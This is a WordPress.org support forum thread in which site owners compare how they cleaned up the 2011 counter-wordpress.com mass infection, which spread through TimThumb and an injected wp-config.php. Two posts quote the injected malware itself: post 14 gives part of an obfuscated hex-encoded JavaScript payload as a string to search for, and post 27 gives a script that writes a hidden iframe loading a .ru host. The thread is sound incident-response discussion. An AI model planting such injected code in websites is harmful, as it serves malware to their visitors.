WordPress.org

Ready to get started?Download WordPress

Forums

Google issuing warnings about WP site: "content from counter-wordpress.com"? (58 posts)

  1. Ian Dore
    Member
    Posted 2 years ago #

    Hey troops,

    I got this off a Slider plugin but I still got an error message with:

    http://*******.com/wp-includes/js/l10n.js?ver=20101110

    Is it just the plugin that is knackered or something else?

    Just asked the server boys to rinse it out and hopefully that will work. The plugin incidentally is called 'Easing Slider' by Matt Ruddy.

    Anything else I need to do?

  2. asdevargas
    Member
    Posted 2 years ago #

    Hello!
    I went through all the steps of changing passwords FTP and MySQL, uploading new version of WordPress, but and when I run http://example.com/wp-admin/install.php I get a message that says "You appear to have already installed WordPress. To reinstall please clear your old database tables first." Do I have to clear the actual DB, install, and then execute a copy of the DB? I don't want to loose all I have on my site!!
    Thanks for helping...

  3. Jorge
    Member
    Posted 2 years ago #

    I have an Elegant Theme and they said they don't use TimThumb anymore because of its known vulnerabilities (no kidding!!)

    you can download a fresh theme from them without TimThumb, i would suggest that. those are the themes that made me an expert overnight on TimThumb. lol

  4. Nihad Nagi
    Member
    Posted 2 years ago #

    (PLEASE TRY THIS BEFORE RANDOM RE-INSTALLATIONS, WHICH IS VERY TIME-CONSUMING, AND DOESN'T ENSURE RECURRENCE EVERYDAY)

    Hi everyone who is facing the Google Chrome security issue, the resolution consist of two processes, that should be done in sequence:

    1)Log-in to you cpanel, and open the wp-config.php file and note that the file should not exceed 92 lines,with

    /** Sets up WordPress vars and included files. */
    require_once(ABSPATH . 'wp-settings.php');

    that should be the last line in the file.
    but surprisingly, it will exceed the 6000 lines, scroll down, and you might think its empty, well its not, around line 5000 you will find a strange code patch.Don't try to edit the file by removing the code, because simply when you delete all the code after the line mentioned above and save the file, you will get a fatal error. So Copy all the code from the begining to around line 92 (the line mentioned above), then create new file named XXXXXX.php, and paste the code copied into it, (optional:you can create another as a backup of your configuration settings), then save the file. Check that the new file exists, open it ensure the pasted settings are in place within the file(PLEASE, dont skip this step ). Then, you will rename the old wp-config.php to say "OLD-wp-config.php", then rename the XXXXX.php to wp-config.php.

    2)You will still receive the message if you accessed your blog, because you have to update google via your google webmasters tool , and go to your domain dashboard that you are having the message for,go to diagnostics-malware, and you should receive this message "Google has not detected any malware on this site.", and request a review and in less than 60 seconds, the message is gone.

    After that i recommend that you change your admin password, and change the permission settings for the new wp-config.php, which is the vulnerability we left open to wordpress competitors, i guess we all know them, so it got nothing to do with wordpress, its users created vulnerability we did.
    PLEASE PROVIDE ME WITH FEEDBACK,I Hope i helped.

  5. Jorge
    Member
    Posted 2 years ago #

    "You appear to have already installed WordPress. To reinstall please clear your old database tables first." Do I have to clear the actual DB, install, and then execute a copy of the DB?

    Sad to say, I'm not using the old database because I felt it might be compromised. I also have not had the time to research the database to find any injected tables. I had to rebuild from scratch but I caught these issues when I was building a new Website, not when it was in production. I have literally done double the work to get my Network back to production level.

    I wasn't going to take any chances because it will be deployed to a very discriminating client base. I'm not saying to do anything that I did, I'm simply giving you information on my experience.

    The attack on my site had different simptoms than others, example: I found two /upd.php files (one in my /wp-content directory and the other in /wp-admin dir) and I recognized them as injected files. While others experienced this same issue, other issues they mentioned were not present on my site and everyone that I have spoken to has had a slightly different experience.

    Best wishes

  6. asdevargas
    Member
    Posted 2 years ago #

    oohh.... :-(
    I think I messed it up... I already earased and reinstalled everything
    The "home" is here, but it doesn't find the rest of the contents...
    http://www.devargas.com.es
    Any clue?...

  7. Jorge
    Member
    Posted 2 years ago #

    the file should not exceed 92 lines

    it's more if it's a Network install, or if you're running a plugin like Simple Facebook Connect and inserted code into the /wp-config.php file.

  8. Nihad Nagi
    Member
    Posted 2 years ago #

    Whatever,BUT NOT AROUND 5000 lines of settings, you will still find a strange code injected after more than 3000 empty lines,right?,its not the time for nit-picking, i just hope you get the idea, and it will work, which is much better than seeing that most of the people here has lost the time, and, CONTENT, and it will re-happen,right?, and above all nothing was fixed, I just wrote and i hope it works for even one person in this forum, Thanks Everyone

  9. matale
    Member
    Posted 2 years ago #

    What I did:
    Backup the Site using BackWPup which also saves an XML export.
    Nuked site completely, from re-seller account.
    Re-created site.
    Re-install wordpress with updates theme to fix tinthumb hole.
    Imported wordpress XML.
    Uploaded uploads directory using ftp.

  10. asdevargas
    Member
    Posted 2 years ago #

    I definitely took the long way home, but it seems that it's now fixed... Thank you for helping!!

  11. EricBobrow
    Member
    Posted 2 years ago #

    Thank you nihadnagi!

    My site http://www.acbestpractices.com got warnings in Chrome, but no apparent problem in other browsers. I did a scan with http://sitecheck.sucuri.net/scanner/ and it found that one of the files in the /wp-includes/js/ folder was infected with a known javascript malware. I re-uploaded that file from a reference copy of WP 3.2.1, then rescanned at Sucuri and it came up clean.

    THEN, I went to the wp-config.php file, and found it was 4000+ lines in length. I followed nihadnagi's advice, and copied the first 94 lines (in my case) to a new php file, made sure it was properly saved, then uploaded it and renamed it to wp-config.php (after renaming the other corrupted file).

    Now my site scans clean, and I know that the wp-config file is restored to a proper state. I'll go ahead and change all my passwords too.

    One problem remains: in Chrome, the URL still comes up with a warning, but Google Webmaster Tools says the site is OK - so I can't request a malware review. They say that in some cases it may take a day or more for GWT to have the malware information, and to check back later - so for now I think I'm clean but the site will still come up with warnings in Chrome for visitors.

    Any other advice??

  12. urbanbedougirl
    Member
    Posted 2 years ago #

    Alright I did everything that was recommended and now my blog is gone! It's completely wiped out. I have no idea what to do - how do I get my posts back? I wasn't able to back anything up because I couldn't even get to my dashboard.

  13. urbanbedougirl
    Member
    Posted 2 years ago #

    Oh and I STILL can't get onto my dashboard. I just want to get my posts and go back to Blogger. I've had problems with WP since day one.

  14. darkpollo
    Member
    Posted 2 years ago #

    Hi, i have been infected with this hack.
    Maybe this can help somebody.
    More than one .js file could be affected and the scanner will not detect it.
    Search for
    var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D
    or similar on your -js files.
    I found several -js files infected on plugins and themes.
    Also i found more timthumb.php files on plugins and themes, and i removed them all too.
    Now everything is clean.

  15. Nihad Nagi
    Member
    Posted 2 years ago #

    I am truly happy it worked for you Eric, but let me note something about this issue, the question is how did anyone got access to any plug-in code in the first place?, and change any js libraries?, via this security hole!!!, whatever changes that might work today, they can manipulate This is specially for Eric, you are right about the update to take place, to do it INSTANTLY, you can either:
    1)
    search the help center for the term "malware" and choose the result named "Request a malware review of your site ", or follow this link directly:

    http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=163633

    a pop-up window named "Request a malware review of your site" will appear, and you will find this text:

    Once you're sure your site is free from any infected code and content, you can request a malware review. (CLICK ON THE LINK IN THE ABOVE TEXT IN A NEW TAB, and then click the second process), and then click on the link "reconsideration request", and then recheck instantly you are done.

    OR
    2)resubmit the whole url (you have 10 re-submissions/month)

    But the first will do, cause it did for me, and was all gone in seconds.

    That will do Eric, glad it worked for you and everybody in this forum no matter what changes was done today, the hole via this config file will remain open, good-luck everyone. Thank you Eric.

  16. Nihad Nagi
    Member
    Posted 2 years ago #

    SORRY FOR THE LINE,MY POST REPOSTED FOR ERIC & EVERYONE

    I am truly happy it worked for you Eric, but let me note something about this issue for everyone, the question is how did anyone got access to any plug-in code in the first place?, and change any js libraries?, via this security hole!!!, whatever changes that might work today, they can manipulate them again tomorrow. R u ready for that?
    This is specially for Eric, you are right about the update to take place, to do it INSTANTLY, you can either:
    1)
    search the help center for the term "malware" and choose the result named "Request a malware review of your site ", or follow this link directly:

    http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=163633

    a pop-up window named "Request a malware review of your site" will appear, and you will find this text:

    Once you're sure your site is free from any infected code and content
    , you can request a malware review. (CLICK ON THE LINK IN THE ABOVE TEXT IN A NEW TAB, and then click the second process), and then click on the link "reconsideration request", and then recheck instantly you are done.

    OR
    2)resubmit the whole url (you have 10 re-submissions/month)

    But the first will do, cause it did for me, and was all gone in seconds.

    That will do Eric, glad it worked for you and everybody in this forum no matter what changes was done today, the hole via this config file will remain open, good-luck everyone. Thank you Eric.

  17. Nihad Nagi
    Member
    Posted 2 years ago #

    TO URBAN WHO LOST EVERYTHING & EVERYONE ELSE,DON'T WORRY,CALM DOWN.

    Before helping you out, I have one question:

    Did you access the phpmyadmin via your cpanel, if not, don't you worry.

    If anyone has the same problem as URBAN, my email is nihadnagi@hotmail.com, i will stay online, cause this must be handled one by one, i will be happy to help anyone here, cause i know how it feels, when a blog is gone like dust in the wind.

  18. Sanjeev Mohindra
    Member
    Posted 2 years ago #

    What a morning, woke up to see this warning on the site.

    Checked wp-config was fine, scanned the site, got this file infected

    http://*******.com/wp-includes/js/l10n.js?ver=20101110

    replaced the file with wordpress latest version, reinstall wordpress through dashboard..

    moved wp-config to one level up for security reasons...

    rescanned, everything comes good...

    Clear the browser history to check if I still get this message, and it doesn't....changed all the passwords also..

    Thanks for all the help on this thread, otherwise it would have been a mess...

  19. urbanbedougirl
    Member
    Posted 2 years ago #

    Big thanks to nihadnagi - he helped me restore my blog and clear the malware from my site. I'm very grateful for all of your help and patience with me. :)

  20. laptopstickershop
    Member
    Posted 2 years ago #

    I made a video on how to get rid of the malware content and the warning on your wordpress site here:

    http://www.youtube.com/watch?v=o22faoUkfaE&feature=channel_video_title

    I got the malware on my site because I installed a plugin that was a cashing plugin that was suppose to help my site run faster, but instead I got malware!

    Hope this helps everyone.

  21. Daniel Cid
    Member
    Posted 2 years ago #

    We also posted more details here:

    http://blog.sucuri.net/2011/08/mass-infection-of-wordpress-sites-counter-wordpress-com.html

    Hope it helps people to understand what is going on. Also, if you cleaned the .js file and is still seeing a warning, try o clear your browser cache.

    thanks,

  22. linji45thgen
    Member
    Posted 2 years ago #

    I have 4 sites blacklisted from this, but when I ran the sucuri sitecheck, it came back clean. I changed the two javascript files nonetheless (for not only the four sites, but the other sites on the same host).

    My host did a virus scan and came up with a few of these types of results:
    {HEX}gzbase64.inject.unclassed.14 : ./site1.com/wp-content/plugins/adsense-now/adsense-now.php
    {HEX}base64.inject.unclassed.6 : ./site2.com/wp-content/plugins/wpematico/app/options-settings.php
    {HEX}php.nested.base64.499 :

    So, for sure my Adsense Now plugin is part of some kind of issue. Not sure if the scan is even related to this counter-wordpress issue, though.

  23. Elegant Themes
    Member
    Posted 2 years ago #

    I have been troubleshooting several sites that have been hit with this attack. I notice 2 major hacks going around over the past few days. Once you have updated your theme and removed timthumb (or updated it), here is some info on how to help clean up your site.

    If you have already been hit, then the first thing you should do is open wp-config.php and look for any suspicious code. Generally, you should delete everything after:

    require_once(ABSPATH . 'wp-settings.php');

    Check for suspicious whitespace as well. In one of the attacks, hundreds of lines of white space is been added to try and mask the malicious code.

    Next open index.php and delete everything between:

    require('./wp-blog-header.php');

    ...

    ?>

    After that I would re-install WordPress from within the WordPress Dashboard via the Updates tab to clean up the infected .js files. When you have done that I would probably run Clam-AV if you have it installed, as well as http://sitecheck.sucuri.net/scanner/. Clam will help pick up any suspicious code that has been obfuscated in base64.

    Finally, be sure to change your MySQL passwords and wp-admin passwords just in case. It's also worth mentioning that the timthumb vulnerability affects inactive themes as well. This script is very popular throughout the theme community. I would delete all of your inactive themes just to make sure you don't have any timthumb.php files laying around.

  24. eph2810
    Member
    Posted 2 years ago #

    Okay - reading through this thread means that I am not the only one who got hacked within the last 48 hours. My problem? I have three sites :( ...Don't know how I can find the time to fix them all.

    Thank you all for your help though; I might get my sites backup and running.

  25. eph2810
    Member
    Posted 2 years ago #

    I have my sites on Google's Webmaster Tool and they have given me the information where to find the hack. It is the same hack 'darkpollo' described. Now off to cleaning my blog, hopefully :)

  26. thunpro
    Member
    Posted 2 years ago #

    I just found this forum post after my own blog was hacked with the same exploit the last few days.

    I discovered that my wp-config file was several thousand lines long (instead of the 90 or so lines it should be), and Google Chrome was blocking access to my site as well.

    Thankfully, I use a premium backup plugin called BackupBuddy. I highly recommend using it.

    Thankfully I was able to restore a full, clean back-up with it, and change MySQL database details in the process.

    But that still doesn't fix the exploit. I had no idea about this timthumb.php thing - never heard of it before.

    So I did some digging and found the following website that lists ALL the WordPress themes and plugins that use timthumb.php in some way. Thought this might be very useful for others on here who don't think they have timthumb either:

    http://www.websitedefender.com/web-security/timthumb-vulnerability-wordpress-plugins-themes/

  27. deepak010188
    Member
    Posted 2 years ago #

    hi,

    google webmaster tool find some malware problem on my site in the form of this script
    <script type="text/javascript">
    document.write('<iframe src="http://rycgoka.ru/count1.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
    </script>

    can anyone tall me how can remove this script in my site
    this script appear on my home page in head section
    and i only use two plugin one for google webmaster tool and other for google analytic tool and i checked these plugin for this script
    please give me some solution

  28. Jagan Krishnaraj
    Member
    Posted 2 years ago #

    I got the same problem, I had been resolved this issue with in a couple of days. I wrote my experience here

    http://www.theprogrammersguide.com/overcoming-malware-backlisting-by-google/

    I hope the information helps.

    In my case it was problem with htacess file in my webserver

Topic Closed

This topic has been closed to new replies.

About this Topic